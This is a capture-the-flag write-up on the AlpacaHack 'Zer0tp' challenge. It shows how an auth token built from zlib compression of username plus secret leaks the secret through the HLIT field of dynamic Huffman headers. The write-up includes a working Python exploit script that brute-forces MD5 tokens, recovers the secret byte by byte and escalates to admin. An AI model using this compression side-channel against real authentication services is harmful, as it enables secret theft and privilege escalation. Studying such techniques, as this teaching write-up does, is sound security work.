"AlpacaHack - Zer0tp": A Peek Into Compression Side-Channel Attacks

link to the challenge if you wanna give it a try

(kudos to Ramzy for being great company while solving this challenge, love you bud)

After solving discoParty—the challenge recommended to me by keymoon, I asked for other suggestions from keymoon in hopes of triggering the same dopamine rush from solving a hard CTF challenge.

“…but this is kinda misc-ish chall”, he said.

He referred to this challenge as misc-ish, which at the time discouraged me a little as I was chasing something more “realistic”, but man was I mistaken about how good this one is :)

Enjoy this read, as we’ll talk about a lot of things.

The Challenge

The challenge is an authentication scheme. You log into an auth provider (called Zer0TP), and the latter hands you tokens to give back to access your account on the original website.

Looking at the code, we see the client (the one using Zer0TP as an auth provider) giving the flag under this condition:

1
@app.route("/")
2
def home():
3
    if 'username' not in flask.session:
4
        return flask.redirect("/login")
5

6
    # You can also manage admin users if you're using
7
    # the enterprise plan (1337 USD/month)
8
    r = requests.get(f"http://{ZER0TP_HOST}:{ZER0TP_PORT}/api/is_admin",
9
                     params={"username": flask.session['username']})
10
    is_admin = json.loads(r.text)["is_admin"]
11

12
    return flask.render_template("index.html",
13
                                 flag=FLAG,
14
                                 is_admin=is_admin,
15
                                 username=flask.session['username'])

Tracking down how is_admin is given yields:

1
@app.route("/api/is_admin", methods=["GET"])
2
def is_admin():
3
    username = flask.request.args.get("username", "").encode()
4

5
    r = redis.Redis(host=REDIS_HOST, port=6379, db=0)
6
    admin = r.hget(username, 'admin')
7
    # ...
8

9
    return flask.jsonify({"result": "OK", "is_admin": int(admin)})
10

11

12
@app.route("/api/register", methods=["POST"])
13
def register():
14
    # ...
15

16
    r.hmset(username,
17
            {"pass": hashlib.sha256(password).hexdigest(), "admin": 0})
18
    return flask.jsonify({"result": "OK"})

So we start with a “normal” account. Our goal is to set admin to 1.

Difficulties

I audited Zer0TP’s code and found this interesting endpoint:

1
@app.route("/api/set_admin", methods=["POST"])
2
def set_admin():
3
    # Apply for enterprise plan to use this feature :)
4
    username = flask.request.form.get("username", "").encode()
5
    req_secret = flask.request.form.get("secret", "").encode()
6
    admin = flask.request.form.get("admin", "0")
7

8
    r = redis.Redis(host=REDIS_HOST, port=6379, db=1)
9
    secret = r.get(username)
10
    # ...
11

12
    if secret != req_secret:
13
        return flask.jsonify({"result": "error",
14
                              "reason": "Access denied"})
15
    # ...
16

17
    if admin == '1':
18
        r.hset(username, "admin", 1)
19
    else:
20
        r.hset(username, "admin", 0)
21

22
    return flask.jsonify({"result": "OK"})

If we guess a correct secret, we can set admin to 1. Let’s see how this secret is generated:

1
@app.route("/api/login", methods=["POST"])
2
def login():
3
    # getting username:password and checking password matches hashed_password
4

5
    id = os.urandom(8).hex()
6
    r = redis.Redis(host=REDIS_HOST, port=6379, db=1)
7
    secret = r.get(username)
8
    if secret is None:
9
        secret = base64.b64encode(os.urandom(12))
10
        r.set(username, secret)
11
        r.expire(username, 60*30)
12

13
    token = zlib.compress(username + secret)[:8]
14
    return flask.jsonify({"result": "OK",
15
                          "id": id,
16
                          "token": hashlib.md5(id.encode() + token).hexdigest()})

Each time we log into the provider, a hashed version of id + token is given to us.

It should be clear that our goal should be to:

Crack the md5 hash, then
Guess the secret from the result of zlib compression.

Guessing The Secret

I’ll take a question-based approach to achieve our goal above. The first thing we ask ourselves is: “What is Zlib? And how does .compress() work?“

1. zlib.compress()

According to RFC1950:

In other words, zlib is a data format (think JSON for us web normies) that holds compressed data, i.e., data that was once big in size and is now small in size. The RFC states that zlib uses “DEFLATE” to compress this data into a smaller form.

So how does DEFLATE work?

2. DEFLATE

According to RFC1951:

Turns out DEFLATE is the engine that produces the compressed data, and zlib is a wrapper around this compressed data. If you read the compression algorithm details, you will notice how it uses LZSS (a variant of LZ77) as well as Huffman coding to compress data.

The info for either is beyond the scope of this writeup, but you should check this video which excellently explains the whole process.

In short, though, assume we have ‘foo baar baaz’ as our input, the compressor does the following:

Compresses the input once using LZSS by creating backreferences. Instead of the substring ‘baa’ appearing twice, we only write it once, and its second occurrence becomes a <length, distance> pair, i.e.:

1
foo baar baaz --> foo baar <3,5>z

Jump 5 positions back and write 3 characters, effectively ‘baa’.

Takes the output of LZSS and encodes each symbol (literals, lengths and distances) based on frequencies (Huffman coding):

If a symbol is more frequent, give it a short bit length. For example, if ‘a’ recurs more often, then we give it 1 bit (say 0) to encode it; ‘z’ recurs less often, so we give it 3 bits (say 101), and so on.

3. Block Types (BTYPE)

The DEFLATE bitstream is split into data blocks; each block contains data that is either compressed or uncompressed (you can embed uncompressed data too in a DEFLATE stream). To know which type we’re dealing with, we inspect the 1st byte of DEFLATE:

1
Bit:     0   1   2   3 ...
2
       +---+---+---+=============================+
3
       |BFF|  BTYPE| ... compressed payload ...  |
4
       +---+---+---+=============================+

BTYPE can be:

‘00’ indicating raw uncompressed payload to come
‘01’ indicating a fixed Huffman coding
‘10’ indicating a dynamic Huffman coding

‘11’ is reserved, but never actually used.

You might be wondering: “What is the difference between fixed and dynamic Huffman coding?”

Dynamic VS. Fixed Huffman Coding

In our worked example previously, I mentioned how symbols were encoded using the intuitive approach of giving frequent symbols shorter bit-lengths and vice versa. It turns out the mapping between symbol and code can be dynamically or statically assigned. Here’s how:

If BTYPE = ‘01’, the decompressor holds a hardcoded lookup table for each Huffman code and its corresponding symbol.
If BTYPE = ‘10’, the lookup table is encoded in the block to tell the decompressor how to decode each encoded symbol.

What’s interesting is that info about the payload is encoded in the header, namely:

1
Bit:   0       1..2     3..7      8..12     13..16
2
     +-------+---------+---------+---------+---------+
3
     |BFINAL |  BTYPE  |  HLIT   |  HDIST  |  HCLEN  | ... Code Lengths ...
4
     | (1b)  | (2b=10) | (5 bits)| (5 bits)| (4 bits)|
5
     +-------+---------+---------+---------+---------+

HLIT and HDIST include information about how many <length, distance> pairs exist. If your input triggers a backreference, HLIT will be greater than 0, otherwise it’s 0.

Do you see the oracle?

If we force dynamic Huffman coding (and we can, because we control the username), then the 1st byte of the DEFLATE header can be inspected to see if a substring of our username recurs in the secret or not!

Note: Zlib is a wrapper around DEFLATE, and the 1st byte of DEFLATE is the 3rd byte of Zlib
1
  0   1
2
+---+---+=====================+---+---+---+---+
3
|CMF|FLG|...compressed data...|    ADLER32    |
4
+---+---+=====================+---+---+---+---+

Recovering The Secret

Following our logic train, it should be noted that ideally, the only backreference we generate is the one matching a given prefix + a character from the secret. After some digging through the RFC, I found out that a minimum of 3 similar bytes will trigger a backreference. Our goal then becomes to give a username in which every substring of length 3 occurs exactly once. That way, when we add a prefix + secret[0], noise is reduced and HLIT is more readily inspected.

Where can we find such a sequence, though? Well, after some digging, I found the De Bruijn sequence.

Good. We have everything to solve our 2nd goal. Again, the goal is to recover the secret from this code:

1
import os
2
import zlib
3
import base64
4
import signal
5
import hashlib
6

7
secret = base64.b64encode(os.urandom(12))
8
assert len(secret) == 16
9

10
while True:
11
    username = input().encode()
12
    assert 4 <= len(username) <= 50
13
    print(zlib.compress(username + secret)[:8])

I won’t cover the code in detail, and I trust you can understand it well :)

step2.py

1
import os, sys
2
import zlib
3
import base64
4
import hashlib
5

6
secret = base64.b64encode(os.urandom(12))
7
# secret = b'pcVeloMX8EfvwaoO'
8
assert(len(secret) == 16)
9

10
# username = input('> ').encode()
11
# k = 4 and n = 3 (4**3=64)
12
# I picked this alphabet so it doesn't overlap with the secret base64 alphabet
13
de_bruijn = b':::;::<::=:;;:;<:;=:<;:<<:<=:=;:=<:==;;;<;;=;<<;<=;=<;==<<<=<==='[:44]
14

15
def oracle(guess, prefix):
16
    username = de_bruijn + prefix + guess + b"$#"
17
    assert(4 <= len(username) < 50)
18
    token = zlib.compress(username + secret)[:8]
19
    # HLIT | BTYPE | BFINAL (LSB-pushed first)
20
    # Data elements other than Huffman codes are packed starting with the least-significant bit of the data element.
21
    # sys.stdout.buffer.write(token)
22
    return token[2] >> 3
23

24
prefix = b"$#"
25
alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
26

27
guess = b''
28
for _ in range(16):
29
    for c in alphabet:
30
        byte_c = bytes([c])
31
        l = oracle(byte_c, prefix)
32

33
        if (l == 0): continue
34
        if (l != 0):
35
            guess += byte_c
36
            print(f"[{prefix}] -> {guess}")
37
            prefix = (prefix + byte_c)[-2:]
38
            break
39

40
print(secret == guess)

Cracking MD5

Up until now, we assumed we had the token. In reality, though, the latter is hashed alongside a given id:

1
token = zlib.compress(username + secret)[:8]
2
return flask.jsonify({"result": "OK",
3
                      "id": id,
4
                      "token": hashlib.md5(id.encode() + token).hexdigest()})

I could’ve studied the format of the block header more meticulously, but it was at this moment that I got lazy and dynamically learned which bits, among the 64 bits of the zlib compression output, were stable, and which fluctuated.

The vibe coded script is this:

1
import os
2
import zlib
3
import random
4

5
# --- Challenge Parameters ---
6
secret = b'pcVeloMX8EfvwaoO'  # Or a dummy secret of the same length
7
de_bruijn = b':::;::<::=:;;:;<:;=:<;:<<:<=:=;:=<:==;;;<;;=;<<;<=;=<;==<<<=<==='[:44]
8
alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
9
num_trials = 100_0000
10

11
def generate_token(guess_byte, prefix_bytes):
12
    username = de_bruijn + prefix_bytes + guess_byte + b"$#"
13
    return zlib.compress(username + secret)[:8]
14

15
print(f"[*] Simulating {num_trials} zlib compressions to analyze entropy...")
16

17
# --- Collect Data ---
18
tokens = []
19
for _ in range(num_trials):
20
    c = bytes([random.choice(alphabet)])
21
    # Varying prefix exactly as you would in the real attack (2 bytes)
22
    prefix = bytes([random.choice(alphabet), random.choice(alphabet)])
23
    tokens.append(int.from_bytes(generate_token(c, prefix), 'big'))
24

25
# --- Bitwise Analysis ---
26
all_ones = tokens[0]
27
all_zeros = ~tokens[0] & 0xFFFFFFFFFFFFFFFF
28
fluctuating_bits_mask = 0
29

30
for i in range(1, len(tokens)):
31
    all_ones &= tokens[i]
32
    all_zeros &= ~tokens[i] & 0xFFFFFFFFFFFFFFFF
33
    fluctuating_bits_mask |= (tokens[i] ^ tokens[i-1])
34

35
# Calculate exact number of bits that changed
36
num_fluctuating = bin(fluctuating_bits_mask).count('1')
37
worst_case_complexity = 2 ** num_fluctuating
38

39
# --- Output ---
40
print("\n" + "="*40)
41
print("             ANALYSIS RESULTS")
42
print("="*40)
43
print(f"Stable '1' bits   : {bin(all_ones)}")
44
print(f"Stable '0' bits   : {bin(all_zeros)}")
45
print(f"Fluctuating Mask  : {bin(fluctuating_bits_mask)}")
46
print("-" * 40)
47
print(f"Total Bits Evaluated : 64 (8 bytes)")
48
print(f"Stable Bits          : {64 - num_fluctuating}")
49
print(f"Fluctuating Bits     : {num_fluctuating}")
50
print("-" * 40)
51
print(f"Worst-Case MD5 Brute Force Complexity:")
52
print(f"2^{num_fluctuating} = {worst_case_complexity:,} iterations")
53
print("="*40)
54

55
if worst_case_complexity < 10_000_000:
56
    print("\n[+] Conclusion: This space is small enough to brute-force locally almost instantly.")

Turns out, for 100_000 tries, we had 4 million possible combinations. In linear time, and for a modern computer, that is a walk in the park.

Knowing which bits changed and which stayed the same, I vibe coded a solve script that got the flag like this:

Registers a baseline account on the Zer0TP service to establish an initial, valid session state.
Executes a side-channel brute-force loop to leak the 16-byte secret byte-by-byte. We continuously rename the user with a crafted username incorporating a De Bruijn sequence. By analyzing how changes to the input affect the Huffman tree metadata structures (the HLIT variations reflected in the token hashes), the loop acts as an oracle to confirm correct character guesses.
Cleans up the account state by renaming the user back to the original baseline username (baseusr) once the full 16-byte secret has been successfully recovered.
Escalates privileges to administrator by submitting the leaked secret token directly to the /api/set_admin endpoint.
Authenticates against the third-party application using the escalated session tokens, follows the subsequent redirect, and extracts the target flag (nek0pts{...}) from the application home page.

exploit.py

1
import os
2
import sys
3
import zlib
4
import hashlib
5
import time
6
import requests
7
import re
8

9
# ==========================================
10
# 0. CONFIGURATION
11
# ==========================================
12
ZER0TP_URL = "http://localhost:8080"    # Zer0TP service
13
THIRD_PARTY_URL = "http://localhost:8077" # Third-party app
14

15
BASE_USER = b"baseusr"                        # initial account, 4..49 chars
16
BASE_PASS = b"password123"                    # 8..127 chars
17

18
# ==========================================
19
# 1. ATTACKER CONSTANTS & PRECOMPUTATION
20
# ==========================================
21
de_bruijn = b':::;::<::=:;;:;<:;=:<;:<<:<=:=;:=<:==;;;<;;=;<<;<=;=<;==<<<=<==='[:44]
22
alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
23

24
BASE_1_BITS      = 0b111100010011100000001011100000000000001000000000000000000000000
25
FLUCTUATING_MASK = 0b10000000111111111110000111111100000001110000
26

27
fluctuating_positions = [i for i in range(64) if (FLUCTUATING_MASK >> i) & 1]
28
shifts = [1 << pos for pos in fluctuating_positions]
29
total_iterations = 1 << len(fluctuating_positions)
30

31
# ==========================================
32
# 2. HTTP HELPERS – Zer0TP API
33
# ==========================================
34
def register(username, password):
35
    r = requests.post(f"{ZER0TP_URL}/api/register",
36
                      data={"username": username, "password": password})
37
    res = r.json()
38
    if res.get("result") != "OK":
39
        print(f"[-] Register failed: {res}")
40
        sys.exit(1)
41

42
def login(username, password):
43
    r = requests.post(f"{ZER0TP_URL}/api/login",
44
                      data={"username": username, "password": password})
45
    res = r.json()
46
    if res.get("result") != "OK":
47
        print(f"[-] Login failed for {username}: {res}")
48
        sys.exit(1)
49
    return res["id"].encode(), res["token"]
50

51
def rename(old_username, password, new_username):
52
    r = requests.post(f"{ZER0TP_URL}/api/rename",
53
                      data={"username": old_username,
54
                            "password": password,
55
                            "new_username": new_username,
56
                            "new_password": password})
57
    res = r.json()
58
    if res.get("result") != "OK":
59
        print(f"[-] Rename failed: {res}")
60
        sys.exit(1)
61

62
def make_curl_login(username, password):
63
    """Generate curl command for login"""
64
    return f"""curl -X POST '{ZER0TP_URL}/api/login' \\
65
  -d 'username={username.decode()}' \\
66
  -d 'password={password.decode()}'"""
67

68
def make_curl_third_party_login(username, auth_id, auth_token):
69
    """Generate curl command for third-party login"""
70
    return f"""curl -X POST '{THIRD_PARTY_URL}/login' \\
71
  -d 'username={username.decode()}' \\
72
  -d 'id={auth_id.decode()}' \\
73
  -d 'token={auth_token.decode()}' \\
74
  -c cookies.txt -L"""
75

76
def make_curl_get_flag():
77
    """Generate curl command to get the flag"""
78
    return f"""curl -X GET '{THIRD_PARTY_URL}/' \\
79
  -b cookies.txt"""
80

81
# ==========================================
82
# 3. THE ORACLE (side‑channel via HLIT)
83
# ==========================================
84
def oracle(guess_byte, prefix_bytes, current_username, password):
85
    crafted_username = de_bruijn + prefix_bytes + bytes([guess_byte]) + b"$#"
86
    rename(current_username, password, crafted_username)
87
    challenge_id, target_md5 = login(crafted_username, password)
88

89
    recovered_token = None
90
    for counter in range(total_iterations):
91
        candidate_int = BASE_1_BITS
92
        for i, shift in enumerate(shifts):
93
            if (counter >> i) & 1:
94
                candidate_int |= shift
95
        candidate_bytes = candidate_int.to_bytes(8, 'big')
96
        if hashlib.md5(challenge_id + candidate_bytes).hexdigest() == target_md5:
97
            recovered_token = candidate_bytes
98
            break
99

100
    if recovered_token is None:
101
        print("\n[-] FAILED to crack token! Masks may be wrong.")
102
        sys.exit(1)
103

104
    return recovered_token[2] >> 3, crafted_username
105

106
# ==========================================
107
# 4. EXPLOIT LOOP – recover secret
108
# ==========================================
109
print("[*] Starting Full Exploit Chain against Zer0TP...")
110
print(f"[*] Zer0TP        : {ZER0TP_URL}")
111
print(f"[*] Third-party   : {THIRD_PARTY_URL}")
112
print(f"[*] Base account  : {BASE_USER.decode()}")
113
print(f"[*] Search Space  : 2^{len(fluctuating_positions)} ({total_iterations:,}) hashes per guess\n")
114

115
register(BASE_USER, BASE_PASS)
116
print("[+] Base account created.")
117

118
prefix = b"$#"
119
guess_acc = b""
120
current_name = BASE_USER
121
overall_start = time.time()
122

123
for byte_idx in range(16):
124
    print(f"[*] Brute-forcing secret byte {byte_idx+1}/16...")
125
    byte_start = time.time()
126
    for c in alphabet:
127
        sys.stdout.write(f"\r    Testing '{chr(c)}'...")
128
        sys.stdout.flush()
129
        l, new_name = oracle(c, prefix, current_name, BASE_PASS)
130
        current_name = new_name
131
        if l != 0:
132
            guess_acc += bytes([c])
133
            time_taken = time.time() - byte_start
134
            sys.stdout.write(
135
                f"\r[+] Found byte {byte_idx+1}/16: "
136
                f"{guess_acc.decode()} (in {time_taken:.1f}s)\n"
137
            )
138
            prefix = (prefix + bytes([c]))[-2:]
139
            break
140
    else:
141
        print("\n[-] Exhausted alphabet without finding a valid character.")
142
        sys.exit(1)
143

144
print(f"\n[+] Recovered secret: {guess_acc.decode()}")
145
print(f"[*] Current username (last crafted payload): {current_name}")
146

147
# ==========================================
148
# 5. RENAME BACK TO CLEAN USERNAME
149
# ==========================================
150
print(f"\n[*] Renaming account from '{current_name.decode()}' back to '{BASE_USER.decode()}'...")
151
rename(current_name, BASE_PASS, BASE_USER)
152
current_name = BASE_USER
153
print("[+] Account restored to clean username.")
154

155
# ==========================================
156
# 6. ESCALATE TO ADMIN
157
# ==========================================
158
print("\n[*] Escalating to admin...")
159
r = requests.post(f"{ZER0TP_URL}/api/set_admin",
160
                  data={"username": current_name,
161
                        "secret": guess_acc,
162
                        "admin": "1"})
163
if r.json().get("result") == "OK":
164
    print("[+] Successfully set admin=1 for our account!")
165
else:
166
    print(f"[-] Could not set admin: {r.json()}")
167
    sys.exit(1)
168

169
# Verify admin status
170
verify = requests.get(f"{ZER0TP_URL}/api/is_admin",
171
                     params={"username": current_name})
172
print(f"[*] Admin verification: {verify.json()}")
173

174
# ==========================================
175
# 7. GET THE FLAG FROM THIRD-PARTY APP
176
# ==========================================
177
print("\n[*] Getting fresh login token from Zer0TP...")
178
auth_id, auth_token = login(current_name, BASE_PASS)
179
print(f"[*] Login ID: {auth_id.decode()}")
180
print(f"[*] Login Token: {auth_token}")
181

182
print("\n[*] Logging into third-party app with admin account...")
183
s = requests.Session()
184
resp = s.post(f"{THIRD_PARTY_URL}/login",
185
              data={"username": current_name.decode(),
186
                    "id": auth_id.decode(),
187
                    "token": auth_token},
188
              allow_redirects=False)  # Don't follow redirect to see the 302
189

190
print(f"[*] Third-party login response status: {resp.status_code}")
191
print(f"[*] Response headers: {dict(resp.headers)}")
192

193
if resp.status_code == 302:
194
    print("[+] Login successful (redirecting to /)")
195

196
    # Now follow the redirect to get the flag
197
    home = s.get(f"{THIRD_PARTY_URL}/")
198
    print(f"[*] Home page status: {home.status_code}")
199

200
    # Extract the flag
201
    match = re.search(r"nek0pts\{[^}]+\}", home.text)
202
    if match:
203
        flag = match.group(0)
204
        print("\n" + "="*60)
205
        print(f"[*] Exploit Finished in {(time.time() - overall_start) / 60:.1f} minutes!")
206
        print(f"[*] Recovered secret : {guess_acc.decode()}")
207
        print(f"[+] FLAG : {flag}")
208
        print("="*60)
209
    else:
210
        print("[-] Flag not found in response.")
211
        print("\n[*] Page content (first 1000 chars):")
212
        print(home.text[:1000])
213

214
else:
215
    print(f"[-] Login failed with status {resp.status_code}")
216
    print(f"[-] Response: {resp.text[:500]}")
217

218
    # Generate curl commands for manual debugging
219
    print("\n" + "="*60)
220
    print("[*] MANUAL DEBUGGING COMMANDS:")
221
    print("="*60)
222
    print("\n# 1. Login to Zer0TP:")
223
    print(make_curl_login(current_name, BASE_PASS))
224
    print("\n# 2. Login to Third-Party App (use ID and TOKEN from step 1):")
225
    print(make_curl_third_party_login(current_name, auth_id, auth_token))
226
    print("\n# 3. Get the flag:")
227
    print(make_curl_get_flag())
228
    print("\n# 4. Check admin status:")
229
    print(f"curl -X GET '{ZER0TP_URL}/api/is_admin?username={current_name.decode()}'")

And there we go~ We got the flag :)

Key Takeaways

The Danger of Mixed-Trust Compression: Combining user-controlled data (the username) and sensitive secrets (the auth token) within the same compression context opens the door to side-channel leakage. This is the exact underlying mechanism behind famous web vulnerabilities like CRIME and BREACH.
Tree Metadata as an Oracle: In dynamic Huffman coding (BTYPE = 10), the compressor must send the shape of its trees in the block header via fields like HLIT. Because these field sizes fluctuate based on whether a duplicate string was found, an attacker can use the header size itself as an oracle to confirm or deny character guesses.
De Bruijn Sequences for Noise Reduction: When testing for string matching via compression, using a De Bruijn sequence ensures that every possible $n$ -gram of a certain length occurs exactly once. This eliminates accidental self-overlapping matches within your own payload, isolating the side-channel to only look for matches against the secret.
Empirical Bit-Masking over Math Deficit: When confronted with complex, bit-aligned cryptographic or structural puzzles, mapping the output state empirically using an entropy analysis script can reveal structural invariants. Here, discovering that only a fraction of the 64-bit space actually fluctuated drastically collapsed the MD5 brute-force complexity down to linear, instantly crackable scales.

References & Further Reading

AlpacaHack Challenge: Zer0tp Challenge Page
RFC 1950: ZLIB Compressed Data Format Specification
RFC 1951: DEFLATE Compressed Data Format Specification
De Bruijn Sequences: Wikipedia - De Bruijn Sequence
Visualizing DEFLATE: How DEFLATE Compression Works — An excellent video breakdown of LZSS and Huffman coding interactions.
CRIME & BREACH Attacks: The CRIME Attack Against TLS — Historical context on how compression side-channels break real-world web security protocols.